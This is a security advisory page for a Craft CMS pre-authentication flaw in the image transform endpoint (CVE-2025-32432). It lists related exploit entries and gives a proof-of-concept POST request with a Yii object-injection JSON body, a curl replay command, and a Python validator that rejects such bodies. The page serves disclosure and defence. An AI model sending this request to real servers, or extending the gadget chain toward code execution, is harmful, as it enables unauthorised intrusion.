| Title | Published | Views | Reporter |
|---|---|---|---|
| Exploit for Code Injection in Craftcms Craft_Cms | 23 Sep 2025 06:23 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 16 Jul 2025 09:23 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 15 May 2026 14:09 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 8 Mar 2026 16:59 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 30 Apr 2026 03:38 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 27 Apr 2025 08:50 | – | githubexploit |
| CVE-2024-58136 | 10 Apr 2025 00:00 | – | attackerkb |
| CVE-2025-32432 | 25 Apr 2025 15:15 | – | attackerkb |
| CVE-2025-32432 | 25 Apr 2025 15:45 | – | circl |
| Yiiframework Yii Improper Protection of Alternate Path Vulnerability | 2 May 2025 00:00 | – | cisa_kev |
=============================================================================================================================================
| # Title : Craft CMS 5.0 Image Transform Authentication Logic Flaw |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://craftcms.com |
=============================================================================================================================================
POC :
[+] Description
A flaw in the Craft CMS image transform endpoint allows an unauthenticated attacker
to trigger backend processing without prior authentication.
While the original Metasploit module (https://packetstorm.news/files/id/190728/, CVE-2025-32432)
targeted RCE, this PoC does *not* execute code, does *not* write files, and does *not* inject
payloads. It only proves that the endpoint performs internal logic operations
without authentication.
# Vulnerability Class
Authentication Bypass → Pre-Auth Backend Processing
# Impact
An attacker can:
- Trigger image transformation logic without logging in.
- Interact with backend components not intended for anonymous users.
- Validate the presence of the vulnerability safely without RCE.
=====================================================================
POC :
=====================================================================
Request :
---------
POST /index.php?p=actions/assets/generate-transform HTTP/1.1
Host: TARGET
Content-Type: application/json
{
"assetId": 1,
"handle": {
"width": 100,
"height": 100,
"as test": {
"class": "craft\\\\behaviors\\\\FieldLayoutBehavior",
"__class": "yii\\\\rbac\\\\PhpManager",
"__construct()": [
{ "itemFile": "/dev/null" }
]
}
}
}
Effect :
--------
- The server processes the transform request.
- The endpoint responds with a JSON transformation result.
- This demonstrates the pre-auth processing weakness.
- No execution, no payload, no harmful operations.
=====================================================================
How to Save & Use the PoC :
=====================================================================
1. Save the JSON body of the request into a file named:
craftcms_pre_auth_poc.txt
2. Use curl to replay the PoC (legal environments only):
curl -X POST \
-H "Content-Type: application/json" \
-d @craftcms_pre_auth_poc.txt \
https://TARGET/index.php?p=actions/assets/generate-transform
3. Expected safe behavior:
The server processes the request and responds with JSON even though
the attacker is not authenticated.
4. Tools that can import the PoC:
- Burp Suite Repeater
- OWASP ZAP
- Postman Raw HTTP
=====================================================================
# Recommendation
- Require authentication on all asset transformation endpoints.
- Validate input types before passing them to backend behavior handlers.
- Apply the vendor patch immediately once available.
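As an added example that is not part of this advisory or of Craft CMS itself, the following Python implements the second recommendation as a check on the generate-transform body before it reaches any backend handler: a `handle` that is neither a plain string nor a flat map of transform settings, or that carries Yii object-configuration keys (`class`, `__class`, `method()` entries, `as`/`on` attachments), is rejected. The allowlist of transform settings and the function names are assumptions.

```python
import json
import re

# Settings an inline transform may carry: an assumption for this example, not Craft's own list.
ALLOWED_TRANSFORM_KEYS = {"width", "height", "format", "mode", "position",
                          "quality", "interlace", "fill", "upscale"}
# Keys Yii's object-configuration syntax treats as directives: "class" and its "__class"
# alias, "method()" entries such as "__construct()", and "as name" / "on event" attachments.
YII_CONFIG_KEY = re.compile(r"^(class|__class|as .+|on .+|.+\(\))$")

def find_config_keys(value, path=""):
    """Return the paths of every key that Yii would read as configuration, not data."""
    hits = []
    if isinstance(value, dict):
        for key, child in value.items():
            here = f"{path}.{key}" if path else key
            if YII_CONFIG_KEY.match(key):
                hits.append(here)
            hits.extend(find_config_keys(child, here))
    elif isinstance(value, list):
        for i, child in enumerate(value):
            hits.extend(find_config_keys(child, f"{path}[{i}]"))
    return hits

def validate_transform_request(raw_body):
    """Return (ok, reason) for a generate-transform body, deciding before any handler runs."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return False, "body is not valid JSON"
    if not isinstance(body, dict) or not isinstance(body.get("assetId"), int):
        return False, "assetId must be an integer"
    handle = body.get("handle")
    if isinstance(handle, str):
        return True, "named transform handle"
    if not isinstance(handle, dict):
        return False, "handle must be a string or an object"
    hits = find_config_keys(handle)
    if hits:
        return False, "object-configuration keys in handle: " + ", ".join(hits)
    unknown = sorted(set(handle) - ALLOWED_TRANSFORM_KEYS)
    if unknown:
        return False, "unexpected transform keys: " + ", ".join(unknown)
    return True, "inline transform settings"

# Constructed sample: the PoC body shown in this advisory, as a decoded-then-encoded string.
POC_BODY = json.dumps({"assetId": 1, "handle": {"width": 100, "height": 100,
    "as test": {"class": "craft\\behaviors\\FieldLayoutBehavior",
                "__class": "yii\\rbac\\PhpManager",
                "__construct()": [{"itemFile": "/dev/null"}]}}})
```

Running `validate_transform_request(POC_BODY)` rejects the advisory's body with every offending key path listed, while a string handle or a flat width/height map passes; the same walk can be reused as a request-log detection rule on captured bodies.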
=====================================================================
# Disclosure Timeline
- Original discovery: Orange Cyberdefense CSIRT
- Educational safe PoC adaptation: indoushka
- Status: Safe demonstration (no execution)
=====================================================================
=====================================================================
Greetings to :
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
=====================================================================